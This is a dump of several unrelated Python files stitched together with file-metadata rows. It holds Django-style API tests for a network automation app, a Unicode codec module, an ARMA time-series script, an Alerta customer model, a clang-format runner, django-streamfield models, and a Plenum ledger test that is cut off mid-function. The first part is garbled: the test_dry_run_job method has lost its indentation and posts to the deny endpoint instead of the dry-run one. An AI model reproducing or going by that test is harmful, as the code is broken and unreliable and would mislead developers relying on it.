    @override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
    def test_deny_job_without_permission(self):
        """Denying a scheduled job without run_job permission returns 403."""
        # pk=1 is fine here: the permission check fires before object lookup.
        url = reverse("extras-api:scheduledjob-deny", kwargs={"pk": 1})
        with disable_warnings("django.request"):
            response = self.client.post(url, **self.header)
        self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)
    @override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
    def test_deny_job(self):
        """A permitted user can deny a scheduled job, which deletes it."""
        self.add_permissions("extras.run_job")
        self.add_permissions("extras.add_scheduledjob")
        url = reverse("extras-api:scheduledjob-deny", kwargs={"pk": self.scheduled_job.pk})
        response = self.client.post(url, **self.header)
        self.assertHttpStatus(response, status.HTTP_200_OK)
        # Denial removes the ScheduledJob record entirely.
        self.assertIsNone(ScheduledJob.objects.filter(pk=self.scheduled_job.pk).first())
    @override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
    def test_dry_run_job_without_permission(self):
        """Dry-running a scheduled job without run_job permission returns 403."""
        url = reverse("extras-api:scheduledjob-dry-run", kwargs={"pk": 1})
        with disable_warnings("django.request"):
            response = self.client.post(url, **self.header)
        self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
def test_dry_run_job(self):
self.add_permissions("extras.run_job")
self.add_permissions("extras.add_scheduledjob")
url = reverse("extras-api:scheduledjob-deny", kwargs={"pk": self.scheduled_job.pk})
response = self.client.post(url, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
class RelationshipTest(APIViewTestCases.APIViewTestCase):
    """API CRUD tests for the Relationship model."""

    model = Relationship
    brief_fields = ["display", "id", "name", "slug", "url"]
    # Payloads for POST tests; the last entry omits "slug" to exercise
    # automatic slug generation from "name" (see slug_source below).
    create_data = [
        {
            "name": "Device VLANs",
            "slug": "device-vlans",
            "type": "many-to-many",
            "source_type": "ipam.vlan",
            "destination_type": "dcim.device",
        },
        {
            "name": "Primary VLAN",
            "slug": "primary-vlan",
            "type": "one-to-many",
            "source_type": "ipam.vlan",
            "destination_type": "dcim.device",
        },
        {
            "name": "Primary Interface",
            "slug": "primary-interface",
            "type": "one-to-one",
            "source_type": "dcim.device",
            "source_label": "primary interface",
            "destination_type": "dcim.interface",
            "destination_hidden": True,
        },
        {
            "name": "Relationship 1",
            "type": "one-to-one",
            "source_type": "dcim.device",
            "source_label": "primary interface",
            "destination_type": "dcim.interface",
            "destination_hidden": True,
        },
    ]
    bulk_update_data = {
        "destination_filter": {"role": {"slug": "controller"}},
    }
    choices_fields = ["destination_type", "source_type", "type"]
    slug_source = "name"

    @classmethod
    def setUpTestData(cls):
        """Create site-to-site and site-to-device relationships for list/retrieve tests."""
        site_type = ContentType.objects.get_for_model(Site)
        device_type = ContentType.objects.get_for_model(Device)

        # validated_save() mirrors what the API does (full_clean before save).
        Relationship(
            name="Related Sites",
            slug="related-sites",
            type="many-to-many",
            source_type=site_type,
            destination_type=site_type,
        ).validated_save()
        Relationship(
            name="Unrelated Sites",
            slug="unrelated-sites",
            type="many-to-many",
            source_type=site_type,
            destination_type=site_type,
        ).validated_save()
        Relationship(
            name="Devices found elsewhere",
            slug="devices-elsewhere",
            type="many-to-many",
            source_type=site_type,
            destination_type=device_type,
        ).validated_save()
class RelationshipAssociationTest(APIViewTestCases.APIViewTestCase):
    """API CRUD tests for the RelationshipAssociation model."""

    model = RelationshipAssociation
    brief_fields = ["destination_id", "display", "id", "relationship", "source_id", "url"]
    choices_fields = ["destination_type", "source_type"]

    @classmethod
    def setUpTestData(cls):
        """Build a many-to-many site→device relationship with three existing associations."""
        site_ct = ContentType.objects.get_for_model(Site)
        device_ct = ContentType.objects.get_for_model(Device)

        cls.relationship = Relationship(
            name="Devices found elsewhere",
            slug="elsewhere-devices",
            type="many-to-many",
            source_type=site_ct,
            destination_type=device_ct,
        )
        cls.relationship.validated_save()

        cls.sites = (
            Site.objects.create(name="Empty Site", slug="empty"),
            Site.objects.create(name="Occupied Site", slug="occupied"),
            Site.objects.create(name="Another Empty Site", slug="another-empty"),
        )

        manufacturer = Manufacturer.objects.create(name="Manufacturer 1", slug="manufacturer-1")
        devicetype = DeviceType.objects.create(manufacturer=manufacturer, model="Device Type 1", slug="device-type-1")
        devicerole = DeviceRole.objects.create(name="Device Role 1", slug="device-role-1")
        cls.devices = tuple(
            Device.objects.create(
                name=f"Device {num}", device_type=devicetype, device_role=devicerole, site=cls.sites[1]
            )
            for num in (1, 2, 3)
        )

        # Pre-existing associations: every device is linked to the first site.
        for device in cls.devices:
            RelationshipAssociation(
                relationship=cls.relationship,
                source_type=site_ct,
                source_id=cls.sites[0].pk,
                destination_type=device_ct,
                destination_id=device.pk,
            ).validated_save()

        # POST payloads: associate each device with the third site instead.
        cls.create_data = [
            {
                "relationship": cls.relationship.pk,
                "source_type": "dcim.site",
                "source_id": cls.sites[2].pk,
                "destination_type": "dcim.device",
                "destination_id": device.pk,
            }
            for device in cls.devices
        ]
class SecretTest(APIViewTestCases.APIViewTestCase):
    """API CRUD tests for the Secret model."""

    model = Secret
    brief_fields = ["display", "id", "name", "slug", "url"]
    bulk_update_data = {}
    # POST payloads; the last entry supplies an explicit slug, the others
    # rely on slug auto-generation from "name" (slug_source below).
    create_data = [
        {
            "name": "NAPALM Username",
            "provider": "environment-variable",
            "description": "Username for all NAPALM devices",
            "parameters": {
                "variable": "NAPALM_USERNAME",
            },
        },
        {
            "name": "NAPALM Password",
            "provider": "environment-variable",
            "parameters": {
                "variable": "NAPALM_PASSWORD",
            },
        },
        {
            "name": "GitHub Token for My Repository",
            "slug": "github-token-my-repository",
            "provider": "text-file",
            "parameters": {
                "path": "/github-tokens/user/myusername.txt",
            },
        },
    ]
    slug_source = "name"

    @classmethod
    def setUpTestData(cls):
        """Create three environment-variable-backed secrets for read tests."""
        secrets = (
            Secret(
                name="api-test-1",
                provider="environment-variable",
                parameters={"variable": "API_TEST_1"},
            ),
            Secret(
                name="api-test-2",
                provider="environment-variable",
                parameters={"variable": "API_TEST_2"},
            ),
            Secret(
                name="api-test-3",
                provider="environment-variable",
                parameters={"variable": "API_TEST_3"},
            ),
        )
        # validated_save() runs model validation, matching API behavior.
        for secret in secrets:
            secret.validated_save()
class SecretsGroupTest(APIViewTestCases.APIViewTestCase):
    """API CRUD tests for the SecretsGroup model."""

    model = SecretsGroup
    brief_fields = ["display", "id", "name", "slug", "url"]
    bulk_update_data = {}
    slug_source = "name"

    @classmethod
    def setUpTestData(cls):
        """Create groups (two with secret membership) and define POST payloads."""
        secrets = (
            Secret.objects.create(
                name="secret-1", provider="environment-variable", parameters={"variable": "SOME_VAR"}
            ),
            Secret.objects.create(
                name="secret-2", provider="environment-variable", parameters={"variable": "ANOTHER_VAR"}
            ),
        )
        secrets_groups = (
            SecretsGroup.objects.create(name="Group A", slug="group-a"),
            SecretsGroup.objects.create(name="Group B", slug="group-b"),
            SecretsGroup.objects.create(name="Group C", slug="group-c", description="Some group"),
        )
        # Give the first two groups one member each, so deletion/serialization
        # of groups with associations is covered; Group C stays empty.
        SecretsGroupAssociation.objects.create(
            secret=secrets[0],
            group=secrets_groups[0],
            access_type=SecretsGroupAccessTypeChoices.TYPE_GENERIC,
            secret_type=SecretsGroupSecretTypeChoices.TYPE_SECRET,
        )
        SecretsGroupAssociation.objects.create(
            secret=secrets[1],
            group=secrets_groups[1],
            access_type=SecretsGroupAccessTypeChoices.TYPE_GENERIC,
            secret_type=SecretsGroupSecretTypeChoices.TYPE_SECRET,
        )
        # Entries 2 and 3 omit "slug" to exercise slug auto-generation.
        cls.create_data = [
            {
                "name": "Secrets Group 1",
                "slug": "secrets-group-1",
                "description": "First Secrets Group",
            },
            {
                "name": "Secrets Group 2",
                "description": "Second Secrets Group",
            },
            {
                "name": "Secrets Group 3",
                "description": "Third Secrets Group",
            },
        ]
class SecretsGroupAssociationTest(APIViewTestCases.APIViewTestCase):
    """API CRUD tests for the SecretsGroupAssociation model."""

    model = SecretsGroupAssociation
    brief_fields = ["access_type", "display", "id", "secret", "secret_type", "url"]
    bulk_update_data = {}
    choices_fields = ["access_type", "secret_type"]

    @classmethod
    def setUpTestData(cls):
        """Pair each of three secrets with its own group, then define POST payloads."""
        secrets = (
            Secret.objects.create(
                name="secret-1", provider="environment-variable", parameters={"variable": "SOME_VAR"}
            ),
            Secret.objects.create(
                name="secret-2", provider="environment-variable", parameters={"variable": "ANOTHER_VAR"}
            ),
            Secret.objects.create(
                name="secret-3", provider="environment-variable", parameters={"variable": "YET_ANOTHER"}
            ),
        )
        secrets_groups = (
            SecretsGroup.objects.create(name="Group A", slug="group-a"),
            SecretsGroup.objects.create(name="Group B", slug="group-b"),
            SecretsGroup.objects.create(name="Group C", slug="group-c", description="Some group"),
        )

        # Existing associations: secret N belongs to group N as a generic secret.
        for secret, group in zip(secrets, secrets_groups):
            SecretsGroupAssociation.objects.create(
                secret=secret,
                group=group,
                access_type=SecretsGroupAccessTypeChoices.TYPE_GENERIC,
                secret_type=SecretsGroupSecretTypeChoices.TYPE_SECRET,
            )

        # POST payloads: the same pairs, but as SSH usernames.
        cls.create_data = [
            {
                "group": group.pk,
                "access_type": SecretsGroupAccessTypeChoices.TYPE_SSH,
                "secret_type": SecretsGroupSecretTypeChoices.TYPE_USERNAME,
                "secret": secret.pk,
            }
            for secret, group in zip(secrets, secrets_groups)
        ]
class StatusTest(APIViewTestCases.APIViewTestCase):
    """API CRUD tests for the Status model."""

    model = Status
    brief_fields = ["display", "id", "name", "slug", "url"]
    bulk_update_data = {
        "color": "000000",
    }
    # POST payloads; the last entry omits "slug" to exercise slug
    # auto-generation from "name" (slug_source below).
    create_data = [
        {
            "name": "Pizza",
            "slug": "pizza",
            "color": "0000ff",
            "content_types": ["dcim.device", "dcim.rack"],
        },
        {
            "name": "Oysters",
            "slug": "oysters",
            "color": "00ff00",
            "content_types": ["ipam.ipaddress", "ipam.prefix"],
        },
        {
            "name": "Bad combinations",
            "slug": "bad-combinations",
            "color": "ff0000",
            "content_types": ["dcim.device"],
        },
        {
            "name": "Status 1",
            "color": "ff0000",
            "content_types": ["dcim.device"],
        },
    ]
    slug_source = "name"

    @classmethod
    def setUpTestData(cls):
        """
        Since many `Status` objects are created as part of data migrations, we're
        testing against those. If this seems magical, it's because they are
        imported from `ChoiceSet` enum objects.
        This method is defined just so it's clear that there is no need to
        create test data for this test case.
        See `extras.management.create_custom_statuses` for context.
        """
class TagTest(APIViewTestCases.APIViewTestCase):
    """API CRUD tests for the Tag model."""

    model = Tag
    brief_fields = ["color", "display", "id", "name", "slug", "url"]
    create_data = [
        {
            "name": "Tag 4",
            "slug": "tag-4",
        },
        {
            "name": "Tag 5",
            "slug": "tag-5",
        },
        {
            "name": "Tag 6",
            "slug": "tag-6",
        },
    ]
    bulk_update_data = {
        "description": "New description",
    }

    @classmethod
    def setUpTestData(cls):
        """Create three pre-existing tags for list/retrieve/update tests."""
        for num in (1, 2, 3):
            Tag.objects.create(name=f"Tag {num}", slug=f"tag-{num}")
class WebhookTest(APIViewTestCases.APIViewTestCase):
    """API CRUD tests for the Webhook model."""

    model = Webhook
    brief_fields = ["display", "id", "name", "url"]
    create_data = [
        {
            "content_types": ["dcim.consoleport"],
            "name": "api-test-4",
            "type_create": True,
            "payload_url": "http://api-test-4.com/test4",
            "http_method": "POST",
            "http_content_type": "application/json",
            "ssl_verification": True,
        },
        {
            "content_types": ["dcim.consoleport"],
            "name": "api-test-5",
            "type_update": True,
            "payload_url": "http://api-test-5.com/test5",
            "http_method": "POST",
            "http_content_type": "application/json",
            "ssl_verification": True,
        },
        {
            "content_types": ["dcim.consoleport"],
            "name": "api-test-6",
            "type_delete": True,
            "payload_url": "http://api-test-6.com/test6",
            "http_method": "POST",
            "http_content_type": "application/json",
            "ssl_verification": True,
        },
    ]
    choices_fields = ["http_method"]

    @classmethod
    def setUpTestData(cls):
        """Create one webhook per event type (create/update/delete) bound to DeviceType."""
        obj_type = ContentType.objects.get_for_model(DeviceType)
        for num, event_flag in enumerate(("type_create", "type_update", "type_delete"), start=1):
            webhook = Webhook(
                name=f"api-test-{num}",
                payload_url=f"http://api-test-{num}.com/test{num}",
                http_method="POST",
                http_content_type="application/json",
                ssl_verification=True,
                **{event_flag: True},
            )
            webhook.save()
            # content_types is M2M and can only be set after the initial save.
            webhook.content_types.set([obj_type])
| 35.976433
| 120
| 0.58912
|
4a0f4c13e4d1479ae2cb5ca657706ade8173fe51
| 650
|
py
|
Python
|
Lib/encodings/unicode_internal.py
|
M-Spencer-94/configNOW
|
56828587253202089e77cfdfcf5329f2a7f09b3f
|
[
"PSF-2.0",
"Apache-2.0",
"MIT"
] | 8
|
2016-11-24T09:38:31.000Z
|
2021-04-23T13:04:48.000Z
|
core/Lib/encodings/unicode_internal.py
|
tuankien2601/python222
|
205414c33fba8166167fd8a6a03eda1a68f16316
|
[
"Apache-2.0"
] | 6
|
2020-11-18T15:48:14.000Z
|
2021-05-03T21:20:50.000Z
|
core/Lib/encodings/unicode_internal.py
|
tuankien2601/python222
|
205414c33fba8166167fd8a6a03eda1a68f16316
|
[
"Apache-2.0"
] | 4
|
2015-09-09T11:54:37.000Z
|
2018-05-26T05:08:14.000Z
|
""" Python 'unicode-internal' Codec
Written by Marc-Andre Lemburg (mal@lemburg.com).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
"""
import codecs
### Codec APIs
class Codec(codecs.Codec):
    """Stateless encoder/decoder for the 'unicode-internal' encoding."""

    # Note: Binding these as C functions will result in the class not
    # converting them to methods. This is intended.
    encode = codecs.unicode_internal_encode
    decode = codecs.unicode_internal_decode
class StreamWriter(Codec,codecs.StreamWriter):
    """Stream writer for 'unicode-internal'; inherits all behavior from Codec."""
    pass
class StreamReader(Codec,codecs.StreamReader):
    """Stream reader for 'unicode-internal'; inherits all behavior from Codec."""
    pass
### encodings module API
def getregentry():
    """Return the codec registration entry for this encoding.

    ``codecs.CodecInfo`` is a subclass of the legacy 4-tuple
    ``(encode, decode, streamreader, streamwriter)``, so existing callers
    that unpack the tuple keep working, while the codec registry gains the
    codec's canonical name.
    """
    return codecs.CodecInfo(
        name='unicode-internal',
        encode=Codec.encode,
        decode=Codec.decode,
        streamreader=StreamReader,
        streamwriter=StreamWriter,
    )
| 20.967742
| 69
| 0.733846
|
4a0f4df4a720560a00cbe68ec6c2c66329bf14d0
| 1,555
|
py
|
Python
|
time series regression/ARIMA/ARMA.py
|
Diyago/ML-DL-scripts
|
40718a9d4318d6d6531bcea5998c0a18afcd9cb3
|
[
"Apache-2.0"
] | 142
|
2018-09-02T08:59:45.000Z
|
2022-03-30T17:08:24.000Z
|
time series regression/ARIMA/ARMA.py
|
jerinka/ML-DL-scripts
|
eeb5c3c7c5841eb4cdb272690e14d6718f3685b2
|
[
"Apache-2.0"
] | 4
|
2019-09-08T07:27:11.000Z
|
2021-10-19T05:50:24.000Z
|
time series regression/ARIMA/ARMA.py
|
jerinka/ML-DL-scripts
|
eeb5c3c7c5841eb4cdb272690e14d6718f3685b2
|
[
"Apache-2.0"
] | 75
|
2018-10-04T17:08:40.000Z
|
2022-03-08T18:50:52.000Z
|
# Load modules
from __future__ import print_function
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
from statsmodels.graphics.tsaplots import plot_acf, plot_pacf
import statsmodels.tsa.api as smtsa
from statsmodels.tsa import arima_process
# Function to plot signal, ACF and PACF
def plotds(xt, nlag=50, fig_size=(12, 10)):
    """Plot a time series together with its ACF and PACF panels.

    Parameters
    ----------
    xt : pd.Series or array-like
        The series to plot; non-Series input is wrapped in a Series.
    nlag : int
        Number of lags shown in the ACF/PACF panels. Bug fix: this
        parameter was previously accepted but ignored (lags=50 was
        hard-coded); the default is now 50 so default calls render
        identically to before.
    fig_size : tuple
        Matplotlib figure size in inches.
    """
    if not isinstance(xt, pd.Series):
        xt = pd.Series(xt)
    plt.figure(figsize=fig_size)
    layout = (2, 2)
    # Assign axes: series spans the top row, ACF/PACF share the bottom.
    ax_xt = plt.subplot2grid(layout, (0, 0), colspan=2)
    ax_acf = plt.subplot2grid(layout, (1, 0))
    ax_pacf = plt.subplot2grid(layout, (1, 1))
    # Plot graphs
    xt.plot(ax=ax_xt)
    ax_xt.set_title("Time Series")
    plot_acf(xt, lags=nlag, ax=ax_acf)
    plot_pacf(xt, lags=nlag, ax=ax_pacf)
    plt.tight_layout()
    return None
# Number of samples
n = 600
# Generate an ARMA(1, 1) dataset (AR coefficient 0.6, MA coefficient 0.3;
# np.r_ prepends the conventional leading 1 for the lag polynomials)
ar = np.r_[1, 0.6]
ma = np.r_[1, 0.3]
ar1ma1_data = smtsa.arma_generate_sample(ar=ar, ma=ma, nsample=n)
plotds(ar1ma1_data)
# Impulse response curve of the generating process
plt.plot(arima_process.arma_impulse_response(ar, ma, nobs=20))
plt.ylabel("Impact")
plt.xlabel("Lag")
# Fit an ARMA(1, 1) model by maximum likelihood, without a trend term
ar1ma1 = smtsa.ARMA(ar1ma1_data.tolist(), order=(1, 1)).fit(
    maxlag=30, method="mle", trend="nc"
)
ar1ma1.summary()
# Grid-search ARMA orders (p, q) in {1, 2} x {1, 2} and collect AIC values
aicVal = []
for ari in range(1, 3):
    for maj in range(1, 3):
        arma_obj = smtsa.ARMA(ar1ma1_data.tolist(), order=(ari, maj)).fit(
            maxlag=30, method="mle", trend="nc"
        )
        aicVal.append([ari, maj, arma_obj.aic])
| 25.491803
| 74
| 0.6791
|
4a0f4ed9d17911771d64219727c7b860e772bd21
| 2,439
|
py
|
Python
|
alerta/models/customer.py
|
sauber/alerta
|
312abf1cd02aebbcb7db972f3e0cdaaf62bbbb8a
|
[
"Apache-2.0"
] | null | null | null |
alerta/models/customer.py
|
sauber/alerta
|
312abf1cd02aebbcb7db972f3e0cdaaf62bbbb8a
|
[
"Apache-2.0"
] | null | null | null |
alerta/models/customer.py
|
sauber/alerta
|
312abf1cd02aebbcb7db972f3e0cdaaf62bbbb8a
|
[
"Apache-2.0"
] | 1
|
2021-03-11T18:19:22.000Z
|
2021-03-11T18:19:22.000Z
|
from typing import Any, Dict, List, Optional, Tuple, Union
from uuid import uuid4
from alerta.app import db
from alerta.database.base import Query
from alerta.utils.response import absolute_url
JSON = Dict[str, Any]
class Customer:
    """A customer lookup rule mapping a match pattern to a customer name."""

    def __init__(self, match: str, customer: str, **kwargs) -> None:
        # Generate an id unless one is supplied (e.g. when rehydrating from the DB).
        self.id = kwargs.get('id', str(uuid4()))
        self.match = match
        self.customer = customer

    @classmethod
    def parse(cls, json: JSON) -> 'Customer':
        """Build a Customer from an API request body."""
        return Customer(
            match=json.get('match', None),
            customer=json.get('customer', None)
        )

    @property
    def serialize(self) -> Dict[str, Any]:
        """Return the JSON-serializable API representation."""
        return {
            'id': self.id,
            'href': absolute_url('/customer/' + self.id),
            'match': self.match,
            'customer': self.customer
        }

    def __repr__(self) -> str:
        return 'Customer(id={!r}, match={!r}, customer={!r})'.format(
            self.id, self.match, self.customer)

    @classmethod
    def from_document(cls, doc: Dict[str, Any]) -> 'Customer':
        """Build a Customer from a document-store record (MongoDB-style dict)."""
        return Customer(
            id=doc.get('id', None) or doc.get('_id'),
            match=doc.get('match', None),
            customer=doc.get('customer', None)
        )

    @classmethod
    def from_record(cls, rec) -> 'Customer':
        """Build a Customer from a SQL row (attribute-accessible record)."""
        return Customer(
            id=rec.id,
            match=rec.match,
            customer=rec.customer
        )

    @classmethod
    def from_db(cls, r: Union[Dict, Tuple]) -> 'Customer':
        """Dispatch to the right constructor for the active database backend.

        NOTE(review): implicitly returns None for any other type — callers
        appear to rely on the backend only producing dicts or tuples.
        """
        if isinstance(r, dict):
            return cls.from_document(r)
        elif isinstance(r, tuple):
            return cls.from_record(r)

    def create(self) -> 'Customer':
        """Persist this customer and return the stored representation."""
        return Customer.from_db(db.create_customer(self))

    @staticmethod
    def find_by_id(id: str) -> Optional['Customer']:
        """Look up a single customer by id."""
        return Customer.from_db(db.get_customer(id))

    @staticmethod
    def find_all(query: Query=None) -> List['Customer']:
        """Return all customers matching an optional query."""
        return [Customer.from_db(customer) for customer in db.get_customers(query)]

    def update(self, **kwargs) -> 'Customer':
        """Apply field updates in the database and return the updated customer."""
        return Customer.from_db(db.update_customer(self.id, **kwargs))

    def delete(self) -> bool:
        """Delete this customer; returns the backend's success flag."""
        return db.delete_customer(self.id)

    @classmethod
    def lookup(cls, login: str, groups: List[str]) -> List[str]:
        """Resolve the customer names visible to a login/groups combination.

        A wildcard '*' result from the DB means "all customers" and is
        represented to callers as an empty restriction list.
        """
        customers = db.get_customers_by_match(login, matches=groups)
        return customers if customers != '*' else []
| 29.385542
| 83
| 0.595326
|
4a0f4f802dd6c6ca83d97d153d111d4e6a9850be
| 3,750
|
py
|
Python
|
pi4home-core/travis/run-clang-format.py
|
khzd/pi4home
|
937bcdcf77bab111cca10af1fe45c63a55c29aae
|
[
"MIT"
] | 1
|
2019-05-16T02:52:12.000Z
|
2019-05-16T02:52:12.000Z
|
pi4home-core/travis/run-clang-format.py
|
khzd/pi4home
|
937bcdcf77bab111cca10af1fe45c63a55c29aae
|
[
"MIT"
] | null | null | null |
pi4home-core/travis/run-clang-format.py
|
khzd/pi4home
|
937bcdcf77bab111cca10af1fe45c63a55c29aae
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from __future__ import print_function
import argparse
import click
import glob
import json
import multiprocessing
import os
import fnmatch
import re
import shutil
import subprocess
import sys
import tempfile
import threading
import traceback
is_py2 = sys.version[0] == '2'
if is_py2:
import Queue as queue
else:
import queue as queue
HEADER_FILTER = r'^.*/src/pi4home/.*'
def make_absolute(f, directory):
    """Return *f* unchanged if absolute, else normalized relative to *directory*."""
    return f if os.path.isabs(f) else os.path.normpath(os.path.join(directory, f))
def get_tidy_invocation(f, inplace):
    """Build the clang-format command line for a single file.

    Despite the legacy name, this invokes clang-format, not clang-tidy;
    passing inplace=True adds the -i (edit in place) flag.
    """
    flags = ['-i'] if inplace else []
    return ['clang-format-7'] + flags + [f]
def run_tidy(args, queue, lock):
    """Worker-thread body: take filenames off *queue* and run clang-format on each.

    Loops forever; the threads are started as daemons so they die with the
    process once the queue is drained and main() exits.
    NOTE(review): the parameter name `queue` shadows the imported module of
    the same name inside this function.
    """
    while True:
        name = queue.get()
        invocation = get_tidy_invocation(name, args.inplace)
        proc = subprocess.Popen(invocation, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
        output, err = proc.communicate()
        # The lock serializes console output so reports from concurrent
        # workers don't interleave.
        with lock:
            if proc.returncode != 0:
                print(' '.join(invocation))
                print(output.decode('utf-8'))
                print(err.decode('utf-8'))
        queue.task_done()
def progress_bar_show(value):
    """Render a file path for the progress bar, relative to src/pi4home ('' for None)."""
    base = os.path.join(os.getcwd(), 'src', 'pi4home')
    return '' if value is None else os.path.relpath(value, base)
def main():
    """Run clang-format over the pi4home sources using a pool of worker threads."""
    parser = argparse.ArgumentParser()
    parser.add_argument('-j', '--jobs', type=int,
                        default=multiprocessing.cpu_count(),
                        help='number of tidy instances to be run in parallel.')
    parser.add_argument('files', nargs='*', default=['src/pi4home'],
                        help='files to be processed (regex on path)')
    parser.add_argument('-i', '--inplace', action='store_true',
                        help='apply fix-its')
    parser.add_argument('-q', '--quiet', action='store_false',
                        help='Run clang-tidy in quiet mode')
    args = parser.parse_args()

    file_name_re = re.compile('|'.join(args.files))

    # Collect every C++ source/header under src/pi4home that matches the
    # user-supplied path regexes.
    files = []
    for root, _dirnames, filenames in os.walk(os.path.join('src', 'pi4home')):
        for pattern in ('*.cpp', '*.h', '*.tcc'):
            for filename in fnmatch.filter(filenames, pattern):
                files.append(os.path.normpath(os.path.join(os.getcwd(), root, filename)))
    files = sorted(f for f in files if file_name_re.search(f))

    max_task = args.jobs
    return_code = 0
    try:
        # Spin up the formatter-launching worker threads.
        task_queue = queue.Queue(max_task)
        # Lock serializing console output from the workers.
        lock = threading.Lock()
        for _ in range(max_task):
            t = threading.Thread(target=run_tidy,
                                 args=(args, task_queue, lock))
            t.daemon = True
            t.start()

        # Fill the queue with files, showing progress as they are consumed.
        with click.progressbar(files, width=30, file=sys.stderr,
                               item_show_func=progress_bar_show) as bar:
            for name in bar:
                task_queue.put(name)

        # Wait for all queued files to be processed.
        task_queue.join()
    except KeyboardInterrupt:
        print()
        print('Ctrl-C detected, goodbye.')
        # Bug fix: the previous handler referenced an undefined `tmpdir`
        # variable (left over from LLVM's run-clang-tidy.py), so Ctrl-C
        # raised NameError instead of exiting cleanly.
        os.kill(0, 9)

    sys.exit(return_code)
# Only run when executed as a script, not on import.
if __name__ == '__main__':
    main()
| 29.296875
| 85
| 0.598133
|
4a0f5088a3701f0051f90974198ab358b66e9db8
| 730
|
py
|
Python
|
test_project/streamblocks/models.py
|
HtmlMak/django-streamfield
|
d40a3128e531386b1bccbaeb7d6b7529a9650fd8
|
[
"BSD-2-Clause"
] | null | null | null |
test_project/streamblocks/models.py
|
HtmlMak/django-streamfield
|
d40a3128e531386b1bccbaeb7d6b7529a9650fd8
|
[
"BSD-2-Clause"
] | null | null | null |
test_project/streamblocks/models.py
|
HtmlMak/django-streamfield
|
d40a3128e531386b1bccbaeb7d6b7529a9650fd8
|
[
"BSD-2-Clause"
] | 1
|
2021-03-19T16:13:52.000Z
|
2021-03-19T16:13:52.000Z
|
from django.db import models
class RichText(models.Model):
    """StreamField block holding a free-form rich-text fragment."""

    text = models.TextField(blank=True, null=True)

    # Per-block options rendered as extra controls in the block editor.
    options = {
        "gray_bgr": {
            "label": "Block on gray background",
            "type": "checkbox",
            "default": False
        }
    }

    class Meta:
        # Used as the block's display name in the admin.
        verbose_name="Text"
# list of objects
class Column(models.Model):
    """StreamField block representing one column; used as a list of objects."""

    text = models.TextField(null=True, blank=True)

    # StreamField option: this block type holds a list of objects rather
    # than a single instance.
    as_list = True

    class Meta:
        verbose_name="Column"
        verbose_name_plural="Columns"
# Register blocks for StreamField as list of models
# (django-streamfield discovers available block types from this list).
STREAMBLOCKS_MODELS = [
    RichText,
    Column
]
| 21.470588
| 53
| 0.613699
|
4a0f508961280f4d1f83a18c31814503994f1a7b
| 4,663
|
py
|
Python
|
plenum/test/node_request/test_different_ledger_request_interleave.py
|
steptan/indy-plenum
|
488bf63c82753a74a92ac6952da784825ffd4a3d
|
[
"Apache-2.0"
] | null | null | null |
plenum/test/node_request/test_different_ledger_request_interleave.py
|
steptan/indy-plenum
|
488bf63c82753a74a92ac6952da784825ffd4a3d
|
[
"Apache-2.0"
] | null | null | null |
plenum/test/node_request/test_different_ledger_request_interleave.py
|
steptan/indy-plenum
|
488bf63c82753a74a92ac6952da784825ffd4a3d
|
[
"Apache-2.0"
] | null | null | null |
from plenum.test.node_request.helper import sdk_ensure_pool_functional
from plenum.test.helper import sdk_send_random_and_check, sdk_send_random_requests, \
sdk_eval_timeout, sdk_get_and_check_replies
from plenum.test.node_catchup.helper import ensure_all_nodes_have_same_data
from plenum.test.pool_transactions.helper import sdk_add_new_nym, \
prepare_new_node_data, prepare_node_request, sdk_sign_and_send_prepared_request
from plenum.test.test_node import checkProtocolInstanceSetup
from plenum.test.view_change.helper import ensure_view_change
from plenum.test.conftest import tdirWithPoolTxns
from plenum.test.pool_transactions.conftest import sdk_node_theta_added
from plenum.test.primary_selection.conftest import sdk_one_node_added
from plenum.test.batching_3pc.conftest import tconf
def test_different_ledger_request_interleave(tconf, looper, txnPoolNodeSet,
                                             sdk_one_node_added,
                                             tdir,
                                             tdirWithPoolTxns,
                                             allPluginsPath,
                                             sdk_pool_handle, sdk_wallet_client,
                                             sdk_wallet_steward):
    """
    Send pool and domain ledger requests such that they interleave, and do
    view change in between and verify the pool is functional
    """
    new_node = sdk_one_node_added
    sdk_send_random_and_check(looper, txnPoolNodeSet, sdk_pool_handle,
                              sdk_wallet_client, 2)
    ensure_all_nodes_have_same_data(looper, txnPoolNodeSet)

    # Send domain ledger requests but don't wait for replies
    requests = sdk_send_random_requests(looper, sdk_pool_handle,
                                        sdk_wallet_client, 2)

    # Add another node by sending pool ledger request
    _, new_theta = sdk_node_theta_added(looper,
                                        txnPoolNodeSet,
                                        tdir,
                                        tconf,
                                        sdk_pool_handle,
                                        sdk_wallet_steward,
                                        allPluginsPath,
                                        name='new_theta')

    # Send more domain ledger requests but don't wait for replies
    requests.extend(sdk_send_random_requests(looper, sdk_pool_handle,
                                             sdk_wallet_client, 3))

    # Do view change without waiting for replies
    ensure_view_change(looper, nodes=txnPoolNodeSet)
    checkProtocolInstanceSetup(looper, txnPoolNodeSet, retryWait=1)

    # Make sure all requests are completed
    total_timeout = sdk_eval_timeout(len(requests), len(txnPoolNodeSet))
    sdk_get_and_check_replies(looper, requests, timeout=total_timeout)

    sdk_ensure_pool_functional(looper, txnPoolNodeSet,
                               sdk_wallet_client, sdk_pool_handle)

    # Create a new steward so it can author the NODE transaction below.
    new_steward_wallet, steward_did = sdk_add_new_nym(looper,
                                                      sdk_pool_handle,
                                                      sdk_wallet_steward,
                                                      'another_ste',
                                                      role='STEWARD')

    # Send another pool ledger request (NODE) but don't wait for completion of
    # request
    next_node_name = 'next_node'
    sigseed, verkey, bls_key, nodeIp, nodePort, clientIp, clientPort = \
        prepare_new_node_data(tconf, tdir, next_node_name)
    node_req = looper.loop.run_until_complete(
        prepare_node_request(next_node_name, steward_did, clientIp,
                             clientPort, nodeIp, nodePort, bls_key,
                             sigseed))
    sdk_wallet = (new_steward_wallet, steward_did)
    request_couple = sdk_sign_and_send_prepared_request(looper, sdk_wallet,
                                                        sdk_pool_handle,
                                                        node_req)

    # Send more domain ledger requests but don't wait for replies;
